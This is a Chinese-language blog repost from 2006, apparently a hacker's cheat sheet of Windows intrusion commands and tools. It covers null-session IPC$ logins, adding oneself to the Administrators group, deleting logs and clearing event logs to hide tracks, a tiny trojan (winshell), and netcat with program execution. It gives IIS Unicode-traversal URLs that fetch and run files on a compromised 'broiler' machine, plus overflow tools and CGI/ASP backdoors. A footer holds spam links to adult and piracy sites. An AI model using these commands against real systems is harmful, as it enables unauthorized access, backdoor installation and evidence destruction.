<rt id="bn8ez"></rt>
<label id="bn8ez"></label>

  • <span id="bn8ez"></span>

    <label id="bn8ez"><meter id="bn8ez"></meter></label>

    鷹翔宇空

    學習和生活

    BlogJava 首頁 新隨筆 聯系 聚合 管理
      110 Posts :: 141 Stories :: 315 Comments :: 1 Trackbacks

    常用的幾條 NET 命令:
    ==================================================
    (與遠程主機建立空管連接) net use \\IP 地址
    \ipc$ "" /use:""
    (以管理員身份登錄遠程主機) net use \\IP 地址 \ipc$ " 密碼
    " /use:"Administrator"
    (傳送文件到遠程主機 WINNT 目錄下) copy 本機目錄路徑 \ 程序 \\IP 地址
    \admin$
    (查看遠程主機時間) net time \\IP 地址

    (定時啟動某個程序) at \\IP 地址
    02:18 readme.exe
    (查看共享) net view \\IP 地址

    (查看 netbios 工作組列表) nbtstat -A IP 地址

    (將遠程主機 C 盤映射為自己的 F 盤) net use f: \\IP 地址
    \c$ ""/user:"Administrator"
    (這兩條把自己增加到管理員組): net user 用戶名 密碼
    /add
    net localgroup Administrators
    用戶名
    /add
    (斷開連接) net use \\IP 地址
    \ipc$ /delete
    擦屁屁:

    del C:\winnt\system32\logfiles\*.*
    del C:\winnt\ssytem32\config\*.evt
    del C:\winnt\system32\dtclog\*.*
    del C:\winnt\system32\*.log
    del C:\winnt\system32\*.txt
    del C:\winnt\*.txt
    del C:\winnt\*.log

    一、
    netsvc.exe

    下面的命令分別是列出主機上的服務項目、查尋和遠程啟動主機的“時間任務”服務:

    netsvc /list \\IP
    地址

    netsvc schedule \\IP
    地址
    /query
    netsvc \\IP
    地址
    schedule /start


    二、
    OpenTelnet.exe

    遠程啟動主機的 Telnet 服務,并綁定端口到 7878 ,例如:

    OpenTelnet \\IP
    地址 用戶名 密碼
    1 7878
    然后就可以 telnet 到主機的 7878 端口,進入 DOS 方式下:

    telnet IP
    地址
    7878


    三、
    winshell.exe

    一個非常小的木馬(不到 6K ), telnet 到主機的 7878 端口,輸入密碼 winshell ,當看到 CMD> 后,可打下面的命令:

    p Path
    (查看 winshell 主程序的路徑信息)

    b reBoot
    (重新啟動機器)

    d shutDown
    (關閉機器)

    s Shell
    (執行后你就會看到可愛的 “C:\> ”)

    x eXit
    (退出本次登錄會話,此命令并不終止 winshell 的運行)

    CMD>
    http://.../srv.exe
    (通過 http 下載其他網站上的文件到運行 winshell 的機器上)


    四、 3389 登陸器, GUI 方式登錄遠程主機的



    五、
    elsave.exe

    事件日志清除工具

    elsave -s \\IP
    地址
    -l "application" -C
    elsave -s \\IP
    地址
    -l "system" -C
    elsave -s \\IP
    地址
    -l "security" -C
    執行后成功清除應用程序日志,系統日志,安全日志



    六、
    hbulot.exe

    開啟 win2kserver winxp 3389 服務

    hbulot [/r]
    使用 /r 表示安裝完成后自動重起目標使設置生效。



    七、
    nc.exe(netcat.exe)

    一個很好的工具,一些腳本程序都要用到它,也可做溢出后的連接用。

    想要連接到某處
    : nc [-options] hostname port[s] [ports] ...
    綁定端口等待連接
    : nc -l -p port [-options] [hostname] [port]
    參數
    :
    -e prog
    程序重定向,一旦連接,就執行 [ 危險
    !!]
    -g gateway source-routing hop point[s], up to 8
    -G num source-routing pointer: 4, 8, 12, ...
    -h
    幫助信息

    -i secs
    延時的間隔

    -l
    監聽模式,用于入站連接

    -n
    指定數字的 IP 地址,不能用
    hostname
    -o file
    記錄 16 進制的傳輸

    -p port
    本地端口號

    -r
    任意指定本地及遠程端口

    -s addr
    本地源地址

    -u UDP
    模式

    -v
    詳細輸出 —— 用兩個 -v 可得到更詳細的內容

    -w secs timeout
    的時間

    -z
    將輸入輸出關掉 —— 用于掃描時



    八、
    TFTPD32.EXE

    把自己的電腦臨時變為一臺 FTP 服務器,讓肉雞來下載文件, tftp 命令要在肉雞上執行,通常要利用 Unicode 漏洞或 telnet 到肉雞,例如:

    http://IP
    地址 /s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c tftp -i 本機 IP 地址 get 文件名 c:\winnt\system32\ 文件名
    然后可以直接令文件運行:

    http://IP
    地址 /s cripts/..%255c..%255c/winnt/system32/cmd.exe?/c+ 文件名


    九、 prihack.exe IIS printer 遠程緩沖區溢出工具。 idqover.exe 是溢出 idq 的,選擇 溢出后在一個端口監聽 ,然后用 telnet 連接它的監聽端口,如果溢出成功,一連它的端口,綁定的命令馬上執行。 xploit.exe 是一個圖形界面的 ida 溢出,成功以后 winxp 下需要打 winxp



    一○、 ntis.exe cmd.exe cmdasp.asp 是三個 cgi-backdoor exe 要放到 cgi-bin 目錄下, asp 放到有 ASP 執行權限的目錄。然后用 IE 瀏覽器連接。



    一、一 Xscan 命令行運行參數說明:


    在檢測過程中,按 "[ 空格 ]" 鍵可以查看各線程狀態及掃描進度,按 "q" 鍵保存當前數據后提前退出程序,按 "<ctrl+c>" 強行關閉程序。


    1.
    命令格式 : xscan -host < 起始 IP>[-< 終止 IP>] < 檢測項目 > [ 其他選項
    ]
    xscan -file <
    主機列表文件名 > < 檢測項目 > [ 其他選項
    ]

    其中 < 檢測項目 > 含義如下
    :
    -port :
    檢測常用服務的端口狀態 ( 可通過 \dat\config.ini 文件的 "PORT-SCAN-OPTIONS\PORT-LIST" 項定制待檢測端口列表 )

    -ftp :
    檢測 FTP 弱口令 ( 可通過 \dat\config.ini 文件設置用戶名 / 密碼字典文件 )

    -ntpass :
    檢測 NT-Server 弱口令 ( 可通過 \dat\config.ini 文件設置用戶名 / 密碼字典文件 )

    -cgi :
    檢測 CGI 漏洞 ( 可通過 \dat\config.ini 文件的 "CGI-ENCODE\encode_type" 項設置編碼方案 )

    -iis :
    檢測 IIS 漏洞 ( 可通過 \dat\config.ini 文件的 "CGI-ENCODE\encode_type" 項設置編碼方案 )


    [
    其他選項 ] 含義如下
    :
    -v:
    顯示詳細掃描進度

    -p:
    跳過 Ping 不通的主機

    -o:
    跳過沒有檢測到開放端口的主機

    -t <
    并發線程數量 [, 并發主機數量 ]>: 指定最大并發線程數量和并發主機數量 , 默認數量為 100,10

    posted on 2006-05-28 11:30 TrampEagle 閱讀(282) 評論(0)  編輯  收藏 所屬分類: 技術文摘
    主站蜘蛛池模板: 中文永久免费观看网站| 精品亚洲视频在线| 成人黄网站片免费视频| 亚洲人成影院在线观看| 国产亚洲精品91| 亚洲第一网站男人都懂| 污视频网站免费观看| 亚洲精品第一国产综合精品99| 猫咪免费人成在线网站| 亚洲国产av无码精品| 国产日韩AV免费无码一区二区三区| JLZZJLZZ亚洲乱熟无码| 精品一区二区三区高清免费观看 | 亚洲GV天堂GV无码男同| 日本精品人妻无码免费大全| 亚洲成a人片在线看| 永久免费观看的毛片的网站| 国产偷国产偷亚洲高清在线| 中文字幕日韩亚洲| 久久免费国产视频| 亚洲一级片在线播放| 免费观看a级毛片| 亚洲免费无码在线| 亚洲成A人片在线观看无码不卡| 99久久久国产精品免费蜜臀| 色在线亚洲视频www| 国产免费直播在线观看视频| 精品多毛少妇人妻AV免费久久 | 337p日本欧洲亚洲大胆艺术| 99在线视频免费观看视频| 亚洲精品无码成人片久久不卡| 亚洲精品国产综合久久一线| 一级毛片aaaaaa免费看| 亚洲真人无码永久在线观看| 亚洲国产成人久久一区WWW| 国产午夜不卡AV免费| 亚洲一卡2卡3卡4卡乱码 在线| 亚洲日韩国产成网在线观看| 最近中文字幕免费完整| 色噜噜狠狠色综合免费视频 | 日韩a级毛片免费视频|